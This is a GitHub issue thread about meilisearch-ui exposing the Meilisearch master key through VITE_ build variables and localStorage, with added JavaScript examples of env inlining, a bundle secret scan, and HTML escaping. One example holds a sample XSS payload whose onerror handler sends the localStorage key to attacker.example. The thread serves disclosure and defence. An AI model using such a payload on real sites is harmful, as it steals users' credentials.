
Security .env issue when set VITE_SINGLETON_API_KEY & apiKey saved to local storage #161

Closed
reinaldomendes opened this issue Oct 28, 2024 · 5 comments
Labels
bug Something isn't working

Comments

reinaldomendes commented Oct 28, 2024

VITE_xxxx variables are exposed on the frontend

Configuring import.meta.env.VITE_SINGLETON_API_KEY will expose the Meilisearch master key to the world.

From Vite Docs

https://vite.dev/guide/env-and-mode.html#env-files

Important

SECURITY NOTES

.env.*.local files are local-only and can contain sensitive variables. You should add *.local to your .gitignore to avoid them being checked into git.

Since any variables exposed to your Vite source code will end up in your client bundle, VITE_* variables should not contain any sensitive information.

More about the security issue.

vitejs/vite#14412

To Reproduce

  1. Configure meilisearch-ui in Singleton mode
  2. Open meilisearch-ui in Google Chrome
  3. Open the developer console on the Sources tab
  4. Search the assets for apiKey
  5. Add breakpoints where you find apiKey

Screenshots
Search API Key in source
Found Master Key in running code
Master Key found at localStorage

Environments (please complete the following information):

  • Not Applicable. All environments are exposed the same way.
@reinaldomendes reinaldomendes added the bug Something isn't working label Oct 28, 2024
riccox (Owner) commented Oct 31, 2024

@reinaldomendes

The application itself is an SPA, so whether or not the API key is passed this way, it will be exposed on the front end.

And the API key can be found in your browser's local storage as well if you are not in SINGLETON mode.

Maybe this should be written into the docs to make it clear?

reinaldomendes (Author) commented

@riccox

"The application itself is an SPA, so whether or not the API key is passed this way, it will be exposed on the front end."

  • There is a difference in SINGLETON mode. If I download the source code and recompile with those env vars, they will be exposed to the whole world in the file "assets/zustand-xxxx.js".
  • Without passing VITE_SINGLETON_API_KEY in the environment variables, the API key will only be exposed to the client browser (localStorage or debugging the source code).

I just downloaded it from GitHub and then added VITE_SINGLETON_API_KEY to the .env file.

Then I ran pnpm build.

The API key became exposed in dist/assets/zustand-B4CGb1Vr.js

Screenshot from 2024-10-31 06-40-59
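The build-time inlining that the opening report and the repro above describe, as an added example that is not meilisearch-ui's or Vite's own code: a minimal model of how a `VITE_`-prefixed variable is substituted into the emitted asset as a string literal during `pnpm build`, followed by the pre-deploy scan a practitioner would run over `dist/assets/*.js` before shipping. The `.env` contents, the app module, the fake key value, the `app-HASH.js` file name and the `/KEY|SECRET|PASSWORD/` naming heuristic are constructed assumptions of this example; Vite's real replacement happens statically inside its build pipeline and the real file names are content-hashed, as `zustand-B4CGb1Vr.js` above shows.

```javascript
// Added example (not meilisearch-ui's or Vite's own code): a minimal model of
// Vite's build-time env inlining and a scan that catches a secret in the output.
// All sample values below are constructed; the key is fake.

// Constructed .env, in the shape of the one the reporter added before `pnpm build`.
const DOTENV_SAMPLE = `
# constructed example, values are fake
VITE_SINGLETON_HOST=http://meili.internal:7700
VITE_SINGLETON_API_KEY=MASTER-KEY-EXAMPLE-0123456789
DB_PASSWORD=unprefixed-so-never-reaches-the-client
`;

// Constructed app module reading its configuration the way a Vite SPA does.
const APP_SOURCE = `
const host = import.meta.env.VITE_SINGLETON_HOST;
const apiKey = import.meta.env.VITE_SINGLETON_API_KEY;
const dbPassword = import.meta.env.DB_PASSWORD;
export const config = { host, apiKey, dbPassword };
`;

// Parse KEY=VALUE lines; comments and blank lines are skipped.
function parseDotenv(text) {
  const env = {};
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (!line || line.startsWith('#')) continue;
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    env[line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return env;
}

// Only variables carrying the client prefix (Vite's default is VITE_) are
// exposed to browser code; everything else stays out of import.meta.env.
function clientEnv(env, prefix = 'VITE_') {
  return Object.fromEntries(Object.entries(env).filter(([k]) => k.startsWith(prefix)));
}

// Model of the build step: every import.meta.env.NAME reference is replaced by
// a string literal, so the value is physically present in the emitted asset.
// Unexposed names become `undefined`, as they are absent from import.meta.env.
function inlineEnv(source, exposed) {
  return source.replace(
    /import\.meta\.env\.([A-Za-z_][A-Za-z0-9_]*)/g,
    (_, name) => (name in exposed ? JSON.stringify(exposed[name]) : 'undefined'),
  );
}

// Pre-deploy check: look for any known secret value inside the built assets.
// `bundles` maps a file name to its contents (in a real pipeline, read
// dist/assets/*.js with fs.readFileSync and pass the same shape).
function findLeakedSecrets(bundles, secrets) {
  const hits = [];
  for (const [file, text] of Object.entries(bundles)) {
    for (const [name, value] of Object.entries(secrets)) {
      if (value && text.includes(value)) hits.push({ file, name });
    }
  }
  return hits;
}

// Run the whole flow on the constructed inputs. Treating any variable whose
// name matches /KEY|SECRET|PASSWORD/ as sensitive is an assumption of this example.
function demo() {
  const env = parseDotenv(DOTENV_SAMPLE);
  const bundle = inlineEnv(APP_SOURCE, clientEnv(env));
  const sensitive = Object.fromEntries(
    Object.entries(env).filter(([k]) => /KEY|SECRET|PASSWORD/i.test(k)),
  );
  const leaks = findLeakedSecrets({ 'dist/assets/app-HASH.js': bundle }, sensitive);
  return { bundle, leaks };
}

const result = demo();
console.log(result.bundle);
console.log(result.leaks.length ? `LEAK: ${JSON.stringify(result.leaks)}` : 'no secrets in bundle');
```

The scan reports `VITE_SINGLETON_API_KEY` in the emitted asset while `DB_PASSWORD`, which has no `VITE_` prefix, never leaves the server side; the same `findLeakedSecrets` check, fed the real files under `dist/assets/`, is a cheap CI gate against exactly the leak reported in this issue.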

reinaldomendes (Author) commented Oct 31, 2024

@riccox

@reinaldomendes

The application itself is an SPA, so whether or not the API key is passed this way, it will be exposed on the front end.

And the API key can be found in your browser's local storage as well if you are not in SINGLETON mode.

Maybe this should be written into the docs to make it clear?

I think the docs should warn about exposing the master key; it can cause leaks of the master key.

The Docker image is not exposing the API key, but if you download the source and build it, passing VITE_ env variables, the key will be found in the assets JS files (this is a major security issue).

Sensitive information must not be defined in VITE_ variables.

The API key found in local storage may leak via an XSS attack (I understand it is an SPA, but this risk should be noted).

  • I don't know if there is such a type of vulnerability in your meilisearch-ui, but poisoned data from a Meilisearch index may read localStorage and send the master key to an external website.
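The localStorage exfiltration path raised in the comment above, as an added example that is not meilisearch-ui's code: a poisoned index document rendered straight into markup carries an `onerror` handler that reads the key from `localStorage` and sends it off-origin, while the same document rendered through an HTML-escaping path stays inert text. The storage key name `meilisearch-ui-api-key`, the document shape, the fake key value, the `attacker.example` host and the toy browser model are all constructed assumptions; whether meilisearch-ui has such a sink is not established anywhere in this thread.

```javascript
// Added example (not meilisearch-ui's code): why a key kept in localStorage is
// only as safe as every render path in the SPA, and the escaping that closes
// the sink. Storage key name, document shape and the attacker host are
// constructed assumptions.

// Constructed stand-in for window.localStorage (Node has none); any script
// running on the UI's origin can call getItem on the real one.
const fakeLocalStorage = new Map([
  ['meilisearch-ui-api-key', 'MASTER-KEY-EXAMPLE-0123456789'],
]);

// Constructed poisoned document: a field value an attacker wrote into an index
// through some write path; it carries an image whose onerror handler fires.
const POISONED_DOC = {
  id: 42,
  title:
    '<img src=x onerror="fetch(\'https://attacker.example/?k=\'' +
    '+localStorage.getItem(\'meilisearch-ui-api-key\'))">',
};

// Vulnerable render: untrusted field interpolated straight into markup
// (the equivalent of innerHTML / dangerouslySetInnerHTML in a framework).
function renderUnsafe(doc) {
  return `<li data-id="${doc.id}">${doc.title}</li>`;
}

// Escape the five characters that can break out of text or attribute context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened render: every untrusted field is escaped before interpolation, so
// the document is displayed as text and never parsed as a tag.
function renderSafe(doc) {
  return `<li data-id="${escapeHtml(doc.id)}">${escapeHtml(doc.title)}</li>`;
}

// Toy model of the browser: for each tag with an on* handler attribute, "run"
// the handler far enough to see which localStorage keys it reads and return the
// values it would exfiltrate. Real browsers have many more script-bearing
// constructs (script tags, javascript: URLs, svg, ...); this models just one.
function simulateBrowser(html, storage) {
  const exfiltrated = [];
  const handlerAttr = /<\w+[^>]*\bon\w+\s*=\s*"([^"]*)"/g;
  for (const m of html.matchAll(handlerAttr)) {
    const read = /localStorage\.getItem\('([^']+)'\)/.exec(m[1]);
    if (read && storage.has(read[1])) exfiltrated.push(storage.get(read[1]));
  }
  return exfiltrated;
}

// Render the same poisoned document both ways and report what leaks.
function compare() {
  return {
    unsafe: simulateBrowser(renderUnsafe(POISONED_DOC), fakeLocalStorage),
    safe: simulateBrowser(renderSafe(POISONED_DOC), fakeLocalStorage),
  };
}

console.log(compare());
```

The unsafe path hands the master key to the handler; the escaped path yields nothing, because `&lt;img` is never parsed as a tag. In a framework-based UI the default text rendering already escapes, so the sink to audit is any explicit raw-HTML rendering of index fields. A Content-Security-Policy whose `connect-src` is limited to the Meilisearch host is the complementary control: it blocks the `fetch` to `attacker.example` even if a sink is missed, though it does nothing about the key being readable in the first place.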

riccox (Owner) commented Nov 1, 2024

@reinaldomendes

SINGLETON mode is actually designed to be used on a local or internal network.

The risk of master key leaks should be mentioned in the documents.

Could you post a PR for this? Otherwise I will add it to the README file later.

riccox (Owner) commented Nov 4, 2024

Singleton mode usage docs have been updated.

@riccox riccox closed this as completed Nov 4, 2024
@github-project-automation github-project-automation bot moved this from 👁 In Progress to 🍻 Done in Meilisearch-UI Roadmap Nov 4, 2024